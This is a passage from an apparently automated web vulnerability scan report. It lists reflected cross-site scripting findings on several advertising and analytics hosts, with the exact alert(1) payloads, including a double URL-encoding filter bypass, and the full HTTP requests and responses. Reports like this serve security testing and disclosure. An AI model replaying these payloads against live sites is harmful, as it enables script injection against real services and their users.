;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad79400"-alert(1)-"898301abb9">
...[SNIP]...

5.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a932"-alert(1)-"098c112b24 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ9a932"-alert(1)-"098c112b24&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/353.0.js.120x30/1303843300**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ9a932"-alert(1)-"098c112b24&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdbb2%2522%253balert%25281%2529%252f%252fd3a2d6e4cb5 was submitted in the REST URL parameter 2. This input was echoed as bdbb2";alert(1)//d3a2d6e4cb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357bdbb2%2522%253balert%25281%2529%252f%252fd3a2d6e4cb5/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357bdbb2";alert(1)//d3a2d6e4cb5/353.0.js.120x30/1303843317**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce
...[SNIP]...

5.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36c9b%2522%253balert%25281%2529%252f%252fe620cc65532 was submitted in the REST URL parameter 3. This input was echoed as 36c9b";alert(1)//e620cc65532 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3036c9b%2522%253balert%25281%2529%252f%252fe620cc65532/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:42:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3036c9b";alert(1)//e620cc65532/1303843320**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a
...[SNIP]...

5.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3be94"-alert(1)-"68a9d8cb374 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534883be94"-alert(1)-"68a9d8cb374&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843289**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534883be94"-alert(1)-"68a9d8cb374&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 734d6"-alert(1)-"39b801b9989 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G734d6"-alert(1)-"39b801b9989&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843280**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G734d6"-alert(1)-"39b801b9989&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f21b"-alert(1)-"3bd3b22176f was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5f21b"-alert(1)-"3bd3b22176f&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843262**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5f21b"-alert(1)-"3bd3b22176f&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d2bd"-alert(1)-"c32921f3ace was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&8d2bd"-alert(1)-"c32921f3ace=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&8d2bd"-alert(1)-"c32921f3ace=1">
...[SNIP]...

5.100. http://api.bing.com/qsonhs.aspx [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bing.com
Path:   /qsonhs.aspx

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 412b0<img%20src%3da%20onerror%3dalert(1)>167ebef1169 was submitted in the q parameter. This input was echoed as 412b0<img src=a onerror=alert(1)>167ebef1169 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /qsonhs.aspx?form=MSN005&q=412b0<img%20src%3da%20onerror%3dalert(1)>167ebef1169 HTTP/1.1
Host: api.bing.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Content-Length: 79
Content-Type: application/json; charset=utf-8
X-Akamai-TestID: dc4cad0d277c4e69b70a6ff416da300c
Date: Tue, 26 Apr 2011 18:36:47 GMT
Connection: close

{"AS":{"Query":"412b0<img src=a onerror=alert(1)>167ebef1169","FullResults":1}}

5.101. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f7a00<script>alert(1)</script>2b050c4882a was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf7a00<script>alert(1)</script>2b050c4882a&n=ar_int_p92429851&1303842996956 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:29 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf7a00<script>alert(1)</script>2b050c4882a("");

5.102. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 595c5<script>alert(1)</script>e3e814fd6cc was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3595c5<script>alert(1)</script>e3e814fd6cc&c2=6035338&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:44 GMT
Date: Tue, 26 Apr 2011 18:39:44 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3595c5<script>alert(1)</script>e3e814fd6cc", c2:"6035338", c3:".uy!", c4:".id!", c5:"62431291", c6:"", c10:"", c15:"", c16:"", r:""});



5.103. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 66376<script>alert(1)</script>fbc5d350fe7 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=603533866376<script>alert(1)</script>fbc5d350fe7&c3=%EBuy!&c4=%ECid!&c5=62431291&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:45 GMT
Date: Tue, 26 Apr 2011 18:39:45 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"603533866376<script>alert(1)</script>fbc5d350fe7", c3:".uy!", c4:".id!", c5:"62431291", c6:"", c10:"", c15:"", c16:"", r:""});



5.104. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload a0acc<script>alert(1)</script>2c22c5ef1fd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!a0acc<script>alert(1)</script>2c22c5ef1fd&c4=%ECid!&c5=62431291&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 03 May 2011 18:39:46 GMT
Date: Tue, 26 Apr 2011 18:39:46 GMT
Connection: close
Content-Length: 1250

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ar c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6035338", c3:".uy!a0acc<script>alert(1)</script>2c22c5ef1fd", c4:".id!", c5:"62431291", c6:"", c10:"", c15:"", c16:"", r:""});



5.105. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 2724d<script>alert(1)</script>ef3e74934bc was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=%EBuy!&c4=%ECid!2724d<script>alert(1)</script>ef3e74934bc&c5=62431291&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
